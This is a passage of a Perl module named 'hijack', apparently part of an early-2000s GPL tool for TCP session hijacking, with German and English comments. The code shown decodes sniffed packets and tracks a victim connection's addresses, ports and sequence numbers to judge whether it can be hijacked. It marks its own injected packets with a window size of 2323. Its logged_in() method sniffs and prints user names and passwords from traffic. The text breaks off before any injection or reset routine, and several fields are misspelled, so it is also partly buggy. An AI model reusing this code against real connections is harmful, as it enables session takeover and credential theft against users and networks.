package hijack;# Module to store all the hijacking stuff# This modul can be run in stateful or stateless mode# Currently it only supports TCP hijacking methods like:# - injecting a packet# - greet the victim client# - resetting a connection## For more information please read the POD documentation## Programmed by Bastian Ballmann [ bytebeater@crazydj.de ]# http://www.crazydj.de## Last Update: 28.11.2002## This code is licensed under the GPL###[ Loading modules ]###use NetPacket::Ethernet qw(:strip); # Decoding ethernet packetsuse NetPacket::IP qw(:strip);       # Decoding IP packetsuse NetPacket::TCP;                 # Decoding TCP packetsuse Net::RawIP;                     # Creating raw packets###[ Konstruktor ]#### Erstellt aus einer Net::PcapUtils Paket Referenz ein Hijack Objekt# Zur Zeit wird nur TCP/IP unterstuetzt# Default Modus ist stateless.# Es wird also per default nicht zwischen Server und Client unterschieden# Parameter: Pcap packet objectsub new{    ($class, $packet) = @_;    my $obj = {};    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    $obj->{src_ip} = $ip->{src_ip};         # Current source ip (stateless mode)    $obj->{dest_ip} = $ip->{dest_ip};       # Current destination ip (stateless mode)    $obj->{src_port} = $tcp->{src_port};    # Current source port (stateless mode)    $obj->{dest_port} = $tcp->{dest_port};  # Current destination port (stateless mode)    $obj->{seqnum} = $tcp->{seqnum};        # Current sequence number (stateless mode)    $obj->{acknum} = $tcp->{acknum};        # Current acknowledgement number (stateless mode)    $obj->{flags} = $tcp->{flags};          # Current TCP flags    $obj->{hijacked} = [];                  # Array to store hijacked connections    $obj->{login_flag} = 0;                 # Flag to remember if we have seen a correct login process    $obj->{stateful} = 0;                   # Flag to remember if we run in stateless or stateful mode    $obj->{server_ip} = "";                 # Server IP (stateful mode)    $obj->{client_ip} = "";                 # Client IP (stateful mode)    $obj->{server_port} = "";               # Server Port (stateful mode)    $obj->{client_port} = "";               # Client Port (stateful mode)    $obj->{server_seq} = "";                # Server Sequence Nummer (stateful mode)    $obj->{server_ack} = "";                # Server Acknowledgement Nummer (stateful mode)    $obj->{client_seq} = "";                # Client Sequence Nummer (stateful mode)    $obj->{client_ack} = "";                # Client Acknowledgement Nummer (stateful mode)    return bless($obj,$class);}###[ General methods ]#### Methode check() ueberprueft ob das Paket zu "unser" Verbindung gehoert# Parameter: Pcap packet objectsub check{    my ($obj,$packet) = @_;    my ($src_ip,$dest_ip,$src_port,$dest_port);    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    # Are we running in stateful mode?    if($obj->{stateful})    {	# Packet kommt vom Server zu unserem Client	if( ($obj->{server_ip} eq $ip->{src_ip}) &&	    ($obj->{client_ip} eq $ip->{dest_ip}) &&	    ($obj->{server_port} eq $tcp->{src_port}) &&	    ($obj->{client_port} eq $tcp->{dest_port}) &&	    ($tcp->{winsize} ne "2323") )	{	    return 1;	}	# Das Paket kommt von unserem Client und will zum Server	elsif( ($obj->{client_ip} eq $ip->{src_ip}) &&	    ($obj->{server_ip} eq $ip->{dest_ip}) &&	    ($obj->{client_port} eq $tcp->{src_port}) &&	    ($obj->{server_port} eq $tcp->{dest_port}) &&	    ($tcp->{winsize} ne "2323") )	{	    return 1;	}	else	{	    return 0;	}    }    # We are running in stateless mode    else    {	if( ($obj->{src_ip} eq $ip->{src_ip}) && 	    ($obj->{dest_ip} eq $ip->{dest_ip}) && 	    ($obj->{src_port} eq $tcp->{src_port}) && 	    ($obj->{dest_port} eq $tcp->{dest_port}) &&	    ($tcp->{winsize} ne "2323") )	{	    return 1;	}	elsif( ($obj->{src_ip} eq $ip->{dest_ip}) &&	       ($obj->{dest_ip} eq $ip->{src_ip}) &&	       ($obj->{src_port} eq $tcp->{dest_port}) &&	       ($obj->{dest_port} eq $tcp->{src_port}) &&	       ($tcp->{winsize} ne "2323") )	{	    return 1;	}	else	{	    return 0;	}    }}# Methode check_port ueberprueft, ob das Paket den gewuenschten Source- bzw.# Destination Port enthaelt.# Parameter: packet object, src and dest port# Falls ein Port nicht interessiert, dann uebergibt man entweder 0 oder NULLsub check_port{    my ($obj,$packet,$src_port,$dst_port) = @_;    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    # Source port interessiert nicht, check nur Destination port    if( ($src_port == 0) || ($src_port eq "NULL") )    {	if($tcp->{dest_port} eq $dst_port)	{	    return 1;	}	else	{	    return 0;	}    }        # Destination port interessiert nicht, check nur den Source port    elsif( ($dst_port == 0) || ($dst_port eq "NULL") )    {	if($tcp->{src_port} eq $src_port)	{	    return 1;	}	else	{	    return 0;	}    }    # Check ob beide Ports stimmen    else    {	if( ($tcp->{src_port} eq $src_port) && ($tcp->{dest_port} eq $dst_port) )	{	    return 1;	}	else	{	    return 0;	}    }}# Die Methode check_ip ueberprueft, ob das Paket die gewuenschte Source- bzw.# Destination IP enthaelt.# Falls eine IP nicht interessiert, dann uebergibt man entweder 0 oder NULL# Parameter: packet object, src and dest ipsub check_ip{    my ($obj,$packet,$src_ip,$dst_ip) = @_;    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    # Source IP interessiert nicht    if( ($src_ip == 0) || ($src_ip == "NULL") )    {	if($dst_ip eq $ip->{dest_ip})	{	    return 1;	}	else	{	    return 0;	}    }    # Destination IP interessiert nicht    elsif( ($dst_ip == 0) || ($dst_ip eq "NULL") )    {	if($src_ip eq $ip->{src_ip})	{	    return 1;	}	else	{	    return 0;	}    }    # Ueberpruefe beide IPs    elsif( ($ip->{src_ip} eq $src_ip) && ($ip->{dest_ip} eq $dst_ip) )    {	return 1;    }    else    {	return 0;    }}# Methode check_flag ueberprueft, ob das Paket das gewuenschte Flag# gesetzt hat.# Parameter: packet object, flagsub check_flag{    my($obj,$packet,$flag) = @_;    $flag = lc($flag);    # Decode the packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    $flags{urg} = 0x20;    $flags{ack} = 0x10;    $flags{psh} = 0x08;    $flags{rst} = 0x04;    $flags{syn} = 0x02;    $flags{fin} = 0x01;    if($tcp->{flags} & $flags{$flag})    {	return 1;    }    else    {	return 0;    }}# Methode stateful setzt die Server / Client Eigenschaften# Jetzt weiss unser Modul in welche Richtung ein Packet gehoert# Parameter: Net::PcapUtils packet object, Source (server|client)sub stateful{    my($obj,$packet,$src) = @_;    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    # Connection should be observed in stateful mode    $obj->{stateful} = 1;    # Das Paket kommt vom Server    if($src eq "server")    {	$obj->{server_ip} = $ip->{src_ip};	$obj->{client_ip} = $ip->{dest_ip};	$obj->{server_port} = $tcp->{src_port};	$obj->{client_port} = $tcp->{dest_port};	$obj->{server_seq} = $tcp->{seqnum};	$obj->{server_ack} = $tcp->{acknum};    }    elsif($src eq "client")    {	$obj->{server_ip} = $ip->{dest_ip};	$obj->{client_ip} = $ip->{src_ip};	$obj->{server_port} = $tcp->{dest_port};	$obj->{client_port} = $tcp->{src_port};	$obj->{client_seq} = $tcp->{seqnum};	$obj->{client_ack} = $tcp->{acknum};    }	    else    {	print "Unkown option $src in method stateful()\n";    }    return $obj;}# Die Methode stateless gibt dem Modul bekannt, dass wir nicht mehr# im stateful Modus laufen wollensub stateless{    $obj = shift;    $obj->{stateful} = 0;    return $obj;}# Methode set_server_seq() speichert die Server Sequence- und Acknowledgenummer.# Parameter: Net::PcapUtils packet objectsub set_server_seq{    my($obj,$packet) = @_;    # Are we running in stateful mode?    unless($obj->{stateful})     { 	print "You are not running in stateful mode.\n";	print "set_server_seq() aborts!\n"; 	return 0;     }    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    $obj->{server_seq} = $tcp->{seqnum};    $obj->{server_ack} = $tcp->{ackum};    return $obj;}# Methode set_client_seq() speichert die Client Sequence- und Acknowledgenummer.# Parameter: Net::PcapUtils packet objectsub set_client_seq{    my($obj,$packet) = @_;    # Are we running in stateful mode?    unless($obj->{stateful})     { 	print "You are not running in stateful mode.\n";	print "set_client_seq() aborts!\n"; 	return 0;     }    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    $obj->{client_seq} = $tcp->{seqnum};    $obj->{client_ack} = $tcp->{ackum};    return $obj;}# Methode server_seq gibt true zurueck, wenn die Sequence- und# Acknowledgementnummer vom Server bekannt istsub server_seq{    my $obj = shift;    if( ($obj->{server_seq}) && ($obj->{server_ack}) && ($obj->{server_seq} != 0) && ($obj->{server_ack} != 0) )    {	return 1    }    else    {	return 0;    }}# Methode client_seq gibt true zurueck, wenn die Sequence- und# Acknowledgementnummer vom Client bekannt istsub client_seq{    my $obj = shift;    if( ($obj->{client_seq}) && ($obj->{client_ack}) && ($obj->{client_seq} != 0) && ($obj->{client_ack} != 0) )    {	return 1;    }    else    {	return 0;    }}# Methode is_established() ueberprueft ob der TCP Handshake schon erfolgt# ist (anders gesagt, ob es sich um ein ACK Paket und nicht SYN oder # SYN/ACK handelt)sub is_established{    my($obj,$packet) = @_;    # Hat das Paket das SYN Flag gesetzt?    if($obj->check_flag($packet,"syn"))    {	return 0;    }    else    {	return 1;    }}# Die Methode logged_in() versucht einen Login Vorgang# mit zu lesen anhand der Strings USER und PASS# Diese Methode is noch zu buggy, um sie zu verwendensub logged_in{    my($obj,$packet) = @_;    # Decode packet    my $ip = NetPacket::IP->decode(eth_strip($packet));    my $tcp = NetPacket::TCP->decode($ip->{data});    my $payload = $tcp->{data};    if( (($payload =~ /USER/i) || ($payload =~ /login/i)) && !($payload =~ /last\s*login/ig) )    {	print "Found login string\n";	$obj->{loign_flag} = 1;	return 0;    }    elsif(($payload =~ /password/i) || ($payload =~ /PASS/i))    {	print "Found password string\n";	$obj->{login_flag} = 2;	return 0;    }    elsif($payload =~ /last\s*login/ig)    {	print "Found last login message\n";	$obj->{login_flag} = 3;    }    if($obj->{login_flag} == 1)    {	$obj->{login} = $payload;	$obj->{login_flag} = 0;	print "User $payload\n";    }    elsif($obj->{login_flag} == 2)    {	$obj->{password} = $payload;	$obj->{login_flag} = 0;	print "Password $payload\n";    }    if($obj->{login_flag} == 3)    {	print "User logged in\n";	return 1;    }    else    {	return 0;    }    }# Methode update() updated die Objekt Eigenschaften mit den Eigenschaften# aus einem Net::PcapUtils Paket Objekt# Diese Methode updated die Verbindungsinformationen im stateless Modussub update{    my ($obj, $packet) = @_;    # Are we running in stateful mode?    if($obj->{stateful})    {	print "You are running in stateful mode.\n";	print "update() aborted!\n";	return 0;    }    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    $obj->{src_ip} = $ip->{src_ip};    $obj->{dest_ip} = $ip->{dest_ip};    $obj->{src_port} = $tcp->{src_port};    $obj->{dest_port} = $tcp->{dest_port};    $obj->{seqnum} = $tcp->{seqnum};    $obj->{acknum} = $tcp->{acknum};    $obj->{flags} = $tcp->{flags};    return $obj;}# Methode update_seq() updated nur die Sequence und# Acknowledgement Number# Diese Methode updated die Verbindungsinformationen im stateless Modussub update_seq{    my ($obj, $packet) = @_;    # Are we running in stateful mode?    if($obj->{stateful})    {	print "You are running in stateful mode.\n";	print "update_seq() aborted!\n";	return 0;    }    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    $obj->{seqnum} = $tcp->{seqnum};    $obj->{acknum} = $tcp->{acknum};    return $obj;}# Methode is_hijackable ueberprueft ob die Verbindung# gehijackt werden kann.# Also ob die Sequence und Acknowledgement Number mit# gelesen werden kann.sub is_hijackable{    my $obj = shift;    # Are we running in stateful mode?    if($obj->{stateful})    {	if( ($obj->{client_seq}) && ($obj->{client_ack}) && ($obj->{server_seq}) && ($obj->{server_ack}) )	{	    return 1;	}	else	{	    return 0;	}    }    # We are running in stateless mode    else    {	if( ($obj->{seqnum}) && ($obj->{acknum}) )	{	    return 1;	}	else	{	    return 0;	}    }}# Methode is_hijacked merkt sich, dass wir die Verbindung schon gehijackt haben# Parameter: Pcap packet objectsub is_hijacked{    $obj = shift;    my $packet = shift;    # Decode packet    $ip = NetPacket::IP->decode(eth_strip($packet));    $tcp = NetPacket::TCP->decode($ip->{data});    push @{$obj->{hijacked}},$ip->{src_ip} . " " . $ip->{dst_ip};    return $obj;}# Diese Methode dient dazu eine oder alle IPs aus dem hijacked Array# zu entfernen, damit die Verbidnung erneut gehijackt werden kann# Als Parameter kann eine IP angegeben werden, die aus dem Array # geschmissen werden soll. Falls kein Parameter angegeben wird, wird# das komplette Array geloeschtsub unset_hijacked{    my $obj = shift;    my $src = shift;    my $dst = shift;    # Loesche einen Eintrag anhand der Source und Destination IP    if(($src ne "") && ($dst ne ""))    {	# Durchwuehle das Hijacked Array nach der Source und Destination IP